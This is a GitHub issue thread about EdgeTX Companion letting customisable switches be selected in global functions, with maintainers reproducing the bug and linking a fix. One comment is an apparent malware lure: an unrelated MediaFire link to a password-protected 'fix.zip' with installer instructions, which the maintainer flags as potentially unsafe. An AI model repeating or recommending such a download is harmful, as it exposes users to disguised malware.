EdgeTX/edgetx #5485: Companion: you should not be able to select customosable switches in global function

3djc, 2024-08-28:
### Is there an existing issue for this problem?

- [X] I have searched the existing issues

### What part of EdgeTX is the focus of this bug?

Companion

### Current Behavior

[image]

### Expected Behavior

As they are defined per model, you should not be able to select customisable switches in GF. In addition, there is no way they can be 3POS

### Steps To Reproduce

Follow the screenshot

### Version

2.10.3

### Transmitter

Jumper T-Pro

### Operating System (OS)

Windows

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

3djc, 2024-08-28:
Unsure what your answer was about, but deleted the link to potentially unsafe binaries

pfeerick, 2024-08-30:
In this case, Companion matches radio... T20 with a nightly from two weeks ago and also 2.10.4 both allow CS to be selected in GF.

3djc, 2024-08-30:
ouch, need to fix those then

3djc, 2024-08-30:
Just tried t20v2 compile from main, and I cannot select it in GF. In what field did you try it ?

pfeerick, 2024-08-30:
Try **pressing** the CS ;)

3djc, 2024-08-30:
Did you try scrolling or pushing the SW ? Looks like scrolling does properly disable it, but no pushing

3djc, 2024-08-30:
Ok, we crossed :)

3djc, 2024-08-30:
#5488 fix that wrong ability on radio

elecpower, 2026-04-20:
@3djc can this be closed as it seems the PRs fixed?